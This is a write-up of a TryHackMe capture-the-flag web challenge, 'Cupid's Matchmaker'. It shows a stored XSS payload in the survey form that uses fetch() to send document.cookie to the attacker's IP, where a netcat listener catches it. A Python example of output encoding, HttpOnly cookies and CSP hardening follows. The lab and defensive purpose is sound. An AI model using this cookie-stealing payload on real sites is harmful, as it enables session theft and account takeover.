Cupids Matchmaker


🌐 Love at First Breach 2026 - Cupid’s Matchmaker

Category: 🌐 Web
Author: TryHackMe

Challenge Prompt

My Dearest Hacker,

Tired of soulless AI algorithms? At Cupid’s Matchmaker, real humans read your personality survey and personally match you with compatible singles. Our dedicated matchmaking team reviews every submission to ensure you find true love this Valentine’s Day! 💘 No algorithms. No AI. Just genuine human connection.

You can access the web app here: http://MACHINE_IP:5000

Problem Type

  • Web
  • XSS

Solve

Upon visiting the page we see Cupid’s Matchmaker. The page suggests we start by doing the survey.

If we visit the survey, we can put anything we want into the textarea boxes, so how about some XSS? :)
I used:

<script>fetch('http://MY_IP:7777/?c='+document.cookie)</script>


Before submitting the form, start a netcat listener on your machine with nc -nvlp 7777

Submit the form and you should get the flag.
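The payload works because the survey text is rendered in the reviewer's browser without encoding, and the cookie is readable from script. An added example, not from the original writeup or the challenge's own code, showing that rendering pattern beside the hardened form, with an HttpOnly cookie and a CSP as backstops; the function names, field names and the `session` cookie name are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample submission; the field names are hypothetical.
SAMPLE = {"about_me": "<script>document.title='pwned'</script>",
          "hobbies": 'hiking" onmouseover="x'}

def render_review_unsafe(answers):
    """Vulnerable pattern: survey text concatenated into HTML as-is."""
    rows = "".join(f"<li><b>{k}</b>: {v}</li>" for k, v in answers.items())
    return f"<ul>{rows}</ul>"

def render_review_safe(answers):
    """Hardened pattern: HTML-encode names and values at output time."""
    rows = "".join(
        f"<li><b>{html.escape(k)}</b>: {html.escape(v, quote=True)}</li>"
        for k, v in answers.items())
    return f"<ul>{rows}</ul>"

def session_cookie_header(token):
    """Set-Cookie value that page script cannot read via document.cookie."""
    jar = SimpleCookie()
    jar["session"] = token
    jar["session"]["httponly"] = True
    jar["session"]["samesite"] = "Strict"
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()

def security_headers():
    """CSP backstop: no inline script, no fetch() to other origins."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'"}

if __name__ == "__main__":
    print(render_review_unsafe(SAMPLE))
    print(render_review_safe(SAMPLE))
    print("Set-Cookie:", session_cookie_header("constructed-token"))
    print(security_headers())
```

Output encoding is the primary fix; the cookie flags and the CSP limit the damage if an unencoded sink is missed elsewhere.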
